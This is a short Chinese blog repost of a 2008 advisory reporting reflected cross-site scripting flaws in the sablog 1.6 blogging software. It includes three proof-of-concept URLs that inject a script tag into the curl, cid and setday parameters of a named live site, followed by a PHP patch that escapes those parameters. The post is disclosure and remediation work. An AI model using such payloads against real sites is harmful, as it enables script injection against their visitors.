首页 > 网络安全 > sablog 1.6 多个跨站漏洞

sablog 1.6 多个跨站漏洞

2008年4月3日 发表评论 阅读评论

来源:CNsHaRk‘s BLog
Version:sablog 1.6

由于过滤不严,存在多个跨站漏洞

PS:
http://www.amxku.net/?viewmode=list&curl=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.amxku.net/?action=index&cid=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.amxku.net/?action=index&setdate=200804&setday=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>&page=1          

临时解决办法:        

<br />在global.php中过滤curl,cid,setday等 <br />$modelink = &#039;&#039;;<br />if ($action) {<br />$modelink .= &#039;&action=&#039;.$action;<br />}<br />if ($curl) {<br />$modelink .= &#039;&curl=&#039;.htmlspecialchars($curl);<br />}<br />if ($cid) {<br />$modelink .= &#039;&cid=&#039;.htmlspecialchars($cid);<br />}<br />if ($setdate) {<br />$modelink .= &#039;&setdate=&#039;.htmlspecialchars($setdate);<br />}<br />if ($setday) {<br />$modelink .= &#039;&setday=&#039;.htmlspecialchars($setday);<br />}<br />if (intval($_GET&#91;&#039;searchid&#039;&#93;)) {<br />$modelink .= &#039;&searchid=&#039;.htmlspecialchars($_GET&#91;&#039;searchid&#039;&#93;);<br />}<br />if (intval($_GET&#91;&#039;userid&#039;&#93;)) {<br />$modelink .= "&userid=".htmlspecialchars($_GET&#91;&#039;userid&#039;&#93;);<br />}<br />if ($_GET&#91;&#039;item&#039;&#93;) {<br />$item = urlencode(addslashes($item));<br />$modelink .= &#039;&item=&#039;.$item;<br />}

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:sablog 1.6 多个跨站漏洞
本文地址:http://www.woyigui.cn/2008/04/03/sablog-1_6cross-site-vulnerability/

  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*